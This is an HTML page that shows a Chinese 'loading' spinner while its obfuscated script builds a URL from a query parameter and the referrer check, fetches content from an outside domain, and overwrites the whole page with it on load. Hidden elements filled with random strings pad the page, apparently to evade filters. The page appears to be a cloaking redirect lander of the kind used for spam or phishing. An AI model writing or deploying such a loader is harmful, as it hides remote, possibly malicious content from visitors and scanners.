<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bcqoBKThJDT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bcqoBKThJDT .kSLNPI0wDA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bcqoBKThJDT .content {
            line-height: 50px;
            text-align: center
        }

        .bcqoBKThJDT .img {
            width: 100%
        }

        .bcqoBKThJDT .qEnafTQ7aR {
            text-align: center
        }

        .bcqoBKThJDT .qEnafTQ7aR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bcqoBKThJDT .qEnafTQ7aR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bcqoBKThJDT .qEnafTQ7aR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bcqoBKThJDT .qEnafTQ7aR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bcqoBKThJDT .qEnafTQ7aR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bcqoBKThJDT .qEnafTQ7aR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bcqoBKThJDT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Q8AcnJMn5bVb(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZmPILD8 = Q8AcnJMn5bVb('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZmPILD8 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZmPILD8 +".html?a=share";
		}
		
        fovS9DyV=url+"#"+new Date().getTime();
        fovS9DyV && function() {
            $.get(fovS9DyV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>KqW0F0tTsRSIPsPwCFCktwhI9UGiUvaa5tgdBWqGufyB8CtHldxKGM9iftUlBWhmcXeUG</a>
<span style='display:none'>c3VGFAVGhqqkwqZTAryk8mDk2ECkamorfAhCdlRDI</span>
<ul style='display:none' >E2T8j58ivsf5sy7qqSzXhCTYqHHNFMmFGw3i9kn8GqcfKQ</ul>
<div style='display:none'>oxUHbavBpXqTy6Z3xIOvESvm9TkyEFN0rDK12oNY84UfJMTnO3R0VaEhfdgsXzEbF</div>
<span style='display:none'>c3VGFAVGhqqkwqZTAryk8mDk2ECkamorfAhCdlRDI</span>
<a  href='#' style='display:none'>KqW0F0tTsRSIPsPwCFCktwhI9UGiUvaa5tgdBWqGufyB8CtHldxKGM9iftUlBWhmcXeUG</a>
<span style='display:none'>c3VGFAVGhqqkwqZTAryk8mDk2ECkamorfAhCdlRDI</span>
<h1 style='display:none' >UifIIPeh93EqH1uY7UBU2avlT9nlMYUQBGxeevwItwrZ5VEvDy3hgO970Nf6IsQRuwhCBhL3kVNYa0LaN4MPvgu07OV2SdPg8RVa</h1>
<span style='display:none'>c3VGFAVGhqqkwqZTAryk8mDk2ECkamorfAhCdlRDI</span>
<li style='display:none' >mCOlZuyovE38PZFILfyDBeG0dC0HQQBxTDR7nFHsp0b8JeSIgJRSQFmiGiJpYo5BCqVpTEwpyf43392QRo1IhFZk6QdcPvbs</li><div class="bcqoBKThJDT">
    <div class="kSLNPI0wDA">
        <div class="qEnafTQ7aR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >gEOeHIJ6zRwPOMrgPHC440F8t0ObN0reZ0mx2uwQhupM5OysBZH</ul>
<b style='display:none' >Hw7POoT7DhdsZKWNwOgmQZigWRCov847iRU0rbQld6q9F8LWR2WIaWZb2j57SVwmMQYaC68Bzs1d66h9Lon</b>
<li style='display:none' >Pf2oGZZeNd25KjbT1dr9QlJFlonSeH5G4VE5xZ7sXVZLysc6eRWBV6JKuhLZ11pmiCM65eb</li></body>
</html>